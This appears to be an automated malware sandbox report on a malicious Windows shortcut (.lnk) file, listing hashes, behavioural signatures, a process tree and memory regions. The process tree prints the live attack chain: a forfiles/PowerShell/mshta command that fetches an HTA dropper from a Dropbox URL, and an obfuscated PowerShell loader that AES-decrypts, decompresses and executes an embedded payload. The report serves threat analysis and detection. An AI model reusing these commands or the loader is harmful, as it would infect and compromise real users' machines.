Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-02-2024 05:21

General

  • Target

    707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk

  • Size

    1KB

  • MD5

    c7945d1c593363055616d6e427b8e2a2

  • SHA1

    2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b

  • SHA256

    707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50

  • SHA512

    7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1132
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
          4⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -
            5⤵
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1168
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              6⤵
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1204

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WQS6Z484B6BTW1XCZ8AJ.temp

    Filesize

    7KB

    MD5

    7901212826eb130a49dd170cd9e46291

    SHA1

    3e2d163be64f8c261b4685c2e4cd0e93d567bd64

    SHA256

    e5ca5cef2dc4acacc0d2047b84d2be4e23590980a6421157c186f51a63e74825

    SHA512

    f4649624a43bdbca84460ce441eed2fad4f5e61a2605739d296d1cd565a6ae2501efbdc82df910b1f1a1d2972a9b0779b0374aa15f13b98dd42d4d4b3da72fd8

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/1168-72-0x0000000002A00000-0x0000000002A80000-memory.dmp

    Filesize

    512KB

  • memory/1168-89-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/1168-76-0x0000000002A00000-0x0000000002A80000-memory.dmp

    Filesize

    512KB

  • memory/1168-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

    Filesize

    512KB

  • memory/1168-74-0x0000000002A00000-0x0000000002A80000-memory.dmp

    Filesize

    512KB

  • memory/1168-73-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/1168-69-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

    Filesize

    2.9MB

  • memory/1168-70-0x00000000023F0000-0x00000000023F8000-memory.dmp

    Filesize

    32KB

  • memory/1168-71-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/1204-84-0x0000000001E80000-0x0000000001F00000-memory.dmp

    Filesize

    512KB

  • memory/1204-83-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/1204-88-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/1204-87-0x0000000001E80000-0x0000000001F00000-memory.dmp

    Filesize

    512KB

  • memory/1204-86-0x0000000001E80000-0x0000000001F00000-memory.dmp

    Filesize

    512KB

  • memory/1204-85-0x000007FEF4880000-0x000007FEF521D000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-43-0x0000000002670000-0x00000000026F0000-memory.dmp

    Filesize

    512KB

  • memory/2484-40-0x000000001B320000-0x000000001B602000-memory.dmp

    Filesize

    2.9MB

  • memory/2484-42-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-46-0x0000000002670000-0x00000000026F0000-memory.dmp

    Filesize

    512KB

  • memory/2484-44-0x0000000002670000-0x00000000026F0000-memory.dmp

    Filesize

    512KB

  • memory/2484-45-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

    Filesize

    9.6MB

  • memory/2484-41-0x0000000002010000-0x0000000002018000-memory.dmp

    Filesize

    32KB

  • memory/2484-90-0x0000000002670000-0x00000000026F0000-memory.dmp

    Filesize

    512KB